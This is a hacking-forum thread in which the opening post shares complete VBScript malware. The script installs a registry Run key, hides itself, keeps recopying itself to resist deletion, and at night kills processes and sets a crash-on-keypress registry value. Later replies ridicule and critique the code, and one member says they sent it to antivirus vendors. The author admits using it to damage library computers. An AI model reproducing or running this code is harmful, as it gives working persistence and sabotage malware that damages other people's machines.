I am back with a vbscript trojan

The constant threat: viruses, trojans, spyware, ... the list goes on

I am back with a vbscript trojan

Post by Th3_M4d_H4tt3r on Sun Jan 12, 2014 3:46 pm
([msg=78882]see I am back with a vbscript trojan[/msg])

Hey, so i have been working on this trojan that makes its own startup registry, hides itself, it even has an antidelete :twisted: function, that makes sure it stays on the system even if you find and delete the file. its payload causes you to have a blue screen. It took me a while to code this virus but I hope you guys will love it :)
Code: Select all
' Y U No.vbs, coded by th3m4dh4tt3r
Set shell = CreateObject("WScript.Shell")
thisScript = Wscript.ScriptFullName

Function Install()
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\StartMenu",thisScript,"REG_SZ"
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile(thisScript)
objFile.Attributes = 2
End Function

Function AntiDelete()
Dim FSO
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFile thisScript, "C:\Windows\Y U NO.vbs"
FSO.CopyFile "C:\Windows\Y U NO.vbs", thisScript
Set FSO = nothing
End Function

Function CheckTime()
If Time = "9:??:?? PM" Then
  Call Kill()
End If
End Function

Function Kill()
msgbox "U dun goofed, it is sleepy time for your computer.",1,"THEGAME"
shell.Run ("get-process | stop-process -force")
shell.RegWrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters\CrashOnCtrlScroll", "1", "REG_DWORD"
End Function

Install()

While 1 = 1
WScript.Sleep(1000)
AntiDelete()
CheckTime()
WEnd
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Re: I am back with a vbscript trojan

Post by centip3de on Mon Jan 13, 2014 12:45 pm
([msg=78907]see Re: I am back with a vbscript trojan[/msg])

Th3_M4d_H4tt3r wrote:Hey, so i have been working on this trojan that makes its own startup registry, hides itself, it even has an antidelete :twisted: function, that makes sure it stays on the system even if you find and delete the file. its payload causes you to have a blue screen. It took me a while to code this virus but I hope you guys will love it :)


First off, a virus and a trojan are not interchangeable terms. Secondly, this is not a trojan. A trojan (which derives from the famous trojan horse in ancient Greece) is a program that appears to be one thing, but is actually a RAT, or your stealing data, or what have you (e.g. back in ancient Greek times, it appeared as though the trojans had given them the gift of a giant wooden horse, but it was actually just a place to hold the Trojan soldiers so they could slaughter the Greeks). An example program would be one that appears to be an antivirus, but is actually just malicious code to steal credit cards. This is not that. This is just an annoying program that shuts down the computer once in awhile.

Anywho, onto the actual criticisms:
1. This is a trivial program to get around. Simply end the process and delete it.
2. Or, if you want to be creative, I believe changing the system time would also stop it.
3. I'm not exactly sure why you forced a BSOD rather than just restarting/shuting-down the computer.
4. I can't actually comment on the quality of the code, because I don't know VBScript, but I can't say the indentation/formatting is all that great.

3/10 would not love.
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
User avatar
centip3de
Moderator
Moderator
 
Posts: 1430
Joined: Fri Aug 20, 2010 5:46 pm
Blog: View Blog (0)


Re: I am back with a vbscript trojan

Post by hellow533 on Mon Jan 13, 2014 2:31 pm
([msg=78911]see Re: I am back with a vbscript trojan[/msg])

centip3de wrote:
Th3_M4d_H4tt3r wrote:Hey, so i have been working on this trojan that makes its own startup registry, hides itself, it even has an antidelete :twisted: function, that makes sure it stays on the system even if you find and delete the file. its payload causes you to have a blue screen. It took me a while to code this virus but I hope you guys will love it :)


First off, a virus and a trojan are not interchangeable terms. Secondly, this is not a trojan. A trojan (which derives from the famous trojan horse in ancient Greece) is a program that appears to be one thing, but is actually a RAT, or your stealing data, or what have you (e.g. back in ancient Greek times, it appeared as though the trojans had given them the gift of a giant wooden horse, but it was actually just a place to hold the Trojan soldiers so they could slaughter the Greeks). An example program would be one that appears to be an antivirus, but is actually just malicious code to steal credit cards. This is not that. This is just an annoying program that shuts down the computer once in awhile.

Anywho, onto the actual criticisms:
1. This is a trivial program to get around. Simply end the process and delete it.
2. Or, if you want to be creative, I believe changing the system time would also stop it.
3. I'm not exactly sure why you forced a BSOD rather than just restarting/shuting-down the computer.
4. I can't actually comment on the quality of the code, because I don't know VBScript, but I can't say the indentation/formatting is all that great.

3/10 would not love.

And in case he is actually stupid enough to mass email this, or send it any other way, I sent the code into Symantec and McAfee. Just because I already know I dislike OP. Might be because he did anything in Visual Basic.

As for OP,
1: There's always a way to delete it. Always.
2: There isn't even anything stopping me from editing the file in regedit as far as I can tell, meaning I could just make it into garbage and then delete it.
3: If I do gain access to the file where I can read it, it's blatantly obvious where else it writes.
4: Time designation is per read by the end user, meaning it does not cover military set time.
5: The majority of the code is sloppy and pointless.

I don't know why you even bothered.
“Teach me how to hack!”
"What, like, with an axe?"
User avatar
hellow533
Contributor
Contributor
 
Posts: 511
Joined: Thu Jan 29, 2009 3:27 pm
Blog: View Blog (0)


Re: I am back with a vbscript trojan

Post by Goatboy on Mon Jan 13, 2014 7:15 pm
([msg=78917]see Re: I am back with a vbscript trojan[/msg])

Heh, I remember this ass-jackal. He is famous for such threads as:

There's Something About Crypto
Honey, I Copied Some JavaScript
Honey I Copied Some JavaScript 2: DDoS Mishaps
"Deep" Web: My Love Affair with "Multy"-Threaded Python
And my personal favorite
Diary of a Mad Black 0day

And as per his sig, be sure to tip this genius.

Enjoy

<3
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2823
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: I am back with a vbscript trojan

Post by Tentra on Mon Jan 13, 2014 8:04 pm
([msg=78920]see Re: I am back with a vbscript trojan[/msg])

Goatboy wrote:Heh, I remember this ass-jackal. He is famous for such threads as:

There's Something About Crypto
Honey, I Copied Some JavaScript
Honey I Copied Some JavaScript 2: DDoS Mishaps
"Deep" Web: My Love Affair with "Multy"-Threaded Python
And my personal favorite
Diary of a Mad Black 0day

And as per his sig, be sure to tip this genius.

Enjoy

<3


I love your titles, Goatboy. You should write this guy's biography :P
User avatar
Tentra
Poster
Poster
 
Posts: 161
Joined: Wed Apr 30, 2008 4:52 pm
Blog: View Blog (0)


Re: I am back with a vbscript trojan

Post by -Ninjex- on Mon Jan 13, 2014 8:07 pm
([msg=78922]see Re: I am back with a vbscript trojan[/msg])

I think you guys are taking this a little too far.
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1353
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: I am back with a vbscript trojan

Post by limdis on Mon Jan 13, 2014 8:08 pm
([msg=78923]see Re: I am back with a vbscript trojan[/msg])

Hilarious.
Now, I'll be locking this thread with the next post that does not contain actual constructive criticism.
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."
User avatar
limdis
Moderator
Moderator
 
Posts: 1395
Joined: Mon Jun 28, 2010 5:45 pm
Blog: View Blog (0)


Re: I am back with a vbscript trojan

Post by Th3_M4d_H4tt3r on Mon Jan 20, 2014 7:57 pm
([msg=79003]see Re: I am back with a vbscript trojan[/msg])

Goatboy wrote:Heh, I remember this ass-jackal. He is famous for such threads as:

There's Something About Crypto
Honey, I Copied Some JavaScript
Honey I Copied Some JavaScript 2: DDoS Mishaps
"Deep" Web: My Love Affair with "Multy"-Threaded Python
And my personal favorite
Diary of a Mad Black 0day

And as per his sig, be sure to tip this genius.

Enjoy

<3

please excuse me for my old and quite outdated `programming` :lol:
as most of that code is EXTREMELY shity, I saved most of the good code for myself (EG: python base DrDoS exploit + hostlist)
I have been offline for quite a while, to busy with stupid shit like minecraft.
Meh, ill quite that shit and start some REAL hacking again.
EDIT: that code was recovered from an old usb i found in my room, I`m pretty sure i coded it like 6 months ago at the libarary, and ruined a few computers XD
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Re: I am back with a vbscript trojan

Post by fashizzlepop on Mon Jan 20, 2014 8:57 pm
([msg=79009]see Re: I am back with a vbscript trojan[/msg])

Sounds like a really dickish thing to do to the poor library techs. Good job, douche.
The glass is neither half-full nor half-empty; it's merely twice as big as it needs to be.
User avatar
fashizzlepop
Developer
Developer
 
Posts: 2303
Joined: Sat May 24, 2008 1:20 pm
Blog: View Blog (0)


Re: I am back with a vbscript trojan

Post by e3cb on Mon Jan 27, 2014 9:40 am
([msg=79146]see Re: I am back with a vbscript trojan[/msg])

no/11, would not turn up.
<3 FF E4 <3
Do you even asm bruh?
User avatar
e3cb
Experienced User
Experienced User
 
Posts: 62
Joined: Fri Feb 15, 2013 11:32 pm
Location: Orange County
Blog: View Blog (0)


Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 0 guests